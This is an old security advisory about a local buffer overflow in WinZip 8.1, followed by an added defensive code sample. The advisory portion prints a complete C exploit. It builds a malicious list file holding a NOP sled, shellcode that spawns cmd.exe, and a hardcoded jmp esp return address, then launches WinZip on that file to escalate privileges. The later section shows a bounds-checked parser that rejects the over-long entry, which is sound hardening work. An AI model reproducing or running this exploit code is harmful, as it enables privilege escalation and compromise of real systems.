WinZip Local Buffer Overflow
Source: atmacasoft.com  Author: ATmaCA  Published: 2005-06-10

WinZip Local Buffer Overflow (Exploit)

Summary
WinZip is - "The original and most popular of all Windows Zip file utilities."

By zipping a file with the /zipandmail switch of the WinZip command-line tool, a local user can trigger a stack buffer overflow in the program and gain elevated privileges: a list file (/@) containing an over-long path entry overwrites the saved return address.

Credit:
The information has been provided by ATmaCA.
The original article can be found at: http://securitytracker.com/alerts/2004/Sep/1011132.html

Details
Vulnerable Systems:
* WinZip version 8.1

Immune Systems:
* WinZip version 9.0 SR-1

Exploit:
/*
*
* WinZip Command Line Local Buffer Overflow
* http://securitytracker.com/alerts/2004/Sep/1011132.html
* http://www.winzip.com/wz90sr1.htm
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca at icqmail
* Credit to kozan
*
*/

/*
*
* Tested with WinZip 8.1 on Win XP Sp2 En
* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
* http://www.winzip.com/wz90sr1.htm
*
*/

#include <windows.h>
#include <stdio.h>
#include <string.h>   /* strcpy, strcat */

#define NOP 0x90

int main(void)
{
    /* Build the command line: winzip32.exe -* /zipandmail /@ <listfile> */
    char tmpfile[] = "c:\\wzs45.tmp";
    char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
    char zipandmailpar[] = " -* /zipandmail /@ ";
    char runpar[300];
    int i = 0;
    strcpy(runpar, winzippath);
    strcat(runpar, zipandmailpar);
    strcat(runpar, tmpfile);

    /* The list file needs a first input file name; the file itself does not have to exist */
    char inputfile[] = "C:\\someinputfile.ext\n";

    /* Payload: launches a local cmd.exe via msvcrt system() */
    char shellcode[] =
        "\x55\x8B\xEC\x33\xFF"
        "\x57\x83\xEC\x04\xC6\x45\xF8"
        "\x63\xC6\x45\xF9\x6D\xC6\x45"
        "\xFA\x64\xC6\x45\xFB\x2E\xC6"
        "\x45\xFC\x65\xC6\x45\xFD\x78"
        "\xC6\x45\xFE\x65\xB8"
        "\xC7\x93\xC2\x77" /* 77C293C7 system() - WinXP SP2 - msvcrt.dll */
        "\x50\x8D\x45\xF8\x50"
        "\xFF\x55\xF4";

    /* Write the crafted .tmp list file: a valid first entry, then the over-long second entry */
    FILE *di;
    if ((di = fopen(tmpfile, "wb")) == NULL) {
        return 1;
    }

    for (i = 0; i < (int)sizeof(inputfile) - 1; i++)
        fputc(inputfile[i], di);

    fprintf(di, "c:\\");

    /* NOP sled filling the stack buffer up to the saved return address */
    for (i = 0; i < 384; i++)
        fputc(NOP, di);

    for (i = 0; i < (int)sizeof(shellcode) - 1; i++)
        fputc(shellcode[i], di);

    fprintf(di, "\xBF\xAC\xDA\x77"); /* EIP - WinXP SP2 Eng - jmp esp addr */
    fprintf(di, "\x90\x90\x90\x90"); /* NOPs */
    fprintf(di, "\x90\x83\xEC\x74"); /* sub esp,0x74 */
    fprintf(di, "\xFF\xE4\x90\x90"); /* jmp esp */

    fprintf(di, "\n");

    fclose(di);
    WinExec(runpar, SW_SHOW);
    return 0;
}
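The defect the advisory describes is a classic one: a path entry read from the /@ list file is copied into a fixed-size stack buffer without a length check. The following is an added example, not code from the advisory or from WinZip, showing how a list-file reader should bound that copy. The function names (parse_list_entry, scan_list_file, build_sample_listfile) and the 260-byte entry limit (Windows MAX_PATH) are assumptions for illustration; the sample list file is constructed in the same shape as the one the exploit writes (a valid first entry followed by a 384-byte padded path) so that the reader can see the over-long entry being rejected instead of overflowing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed entry limit: MAX_PATH on Windows, including the terminating NUL. */
#define LIST_MAX_PATH 260

/* Return codes of parse_list_entry(). */
enum { ENTRY_OK = 0, ENTRY_TOO_LONG = -1, ENTRY_EMPTY = -2 };

/* Hardened reader for one list-file line.
 * The unchecked shape behind this bug class would be strcpy(out, line) into a
 * fixed LIST_MAX_PATH buffer; here the entry length is measured first and any
 * line that does not fit (with room for the NUL) is rejected before copying. */
int parse_list_entry(const char *line, char out[LIST_MAX_PATH])
{
    size_t n = strcspn(line, "\r\n");          /* entry ends at the line terminator */
    if (n == 0)
        return ENTRY_EMPTY;
    if (n >= LIST_MAX_PATH)                    /* no room for NUL: reject, do not truncate */
        return ENTRY_TOO_LONG;
    memcpy(out, line, n);
    out[n] = '\0';
    return ENTRY_OK;
}

/* Walk an in-memory list file line by line. Returns the number of accepted
 * entries; on the first over-long entry, stops and stores its 1-based line
 * number in *rejected_line (0 if every entry was acceptable). */
int scan_list_file(const char *data, int *rejected_line)
{
    char entry[LIST_MAX_PATH];
    int accepted = 0, lineno = 0;
    const char *p = data;

    *rejected_line = 0;
    while (*p != '\0') {
        int rc;
        lineno++;
        rc = parse_list_entry(p, entry);
        if (rc == ENTRY_TOO_LONG) {
            *rejected_line = lineno;
            return accepted;
        }
        if (rc == ENTRY_OK)
            accepted++;
        p += strcspn(p, "\n");                 /* advance to the next line */
        if (*p == '\n')
            p++;
    }
    return accepted;
}

/* Constructed sample: a legitimate first entry, then "c:\" followed by
 * `padding` filler bytes, mirroring the layout the advisory's exploit writes.
 * Caller frees the returned buffer. */
char *build_sample_listfile(size_t padding)
{
    const char *first = "C:\\someinputfile.ext\n";
    const char *prefix = "c:\\";
    size_t base = strlen(first) + strlen(prefix);
    char *buf = malloc(base + padding + 2);
    if (buf == NULL)
        return NULL;
    strcpy(buf, first);
    strcat(buf, prefix);
    memset(buf + base, 'A', padding);
    buf[base + padding] = '\n';
    buf[base + padding + 1] = '\0';
    return buf;
}

int main(void)
{
    int bad = 0;
    char *data = build_sample_listfile(384);
    if (data == NULL)
        return 1;
    printf("accepted entries: %d\n", scan_list_file(data, &bad));
    printf("first rejected line: %d\n", bad);
    free(data);
    return 0;
}
```

Run stand-alone, the program accepts the first entry and reports line 2 as rejected. The design choice worth noting is that an over-long entry is refused rather than silently truncated: truncation would keep the program in bounds but could make it operate on a different path than the user named.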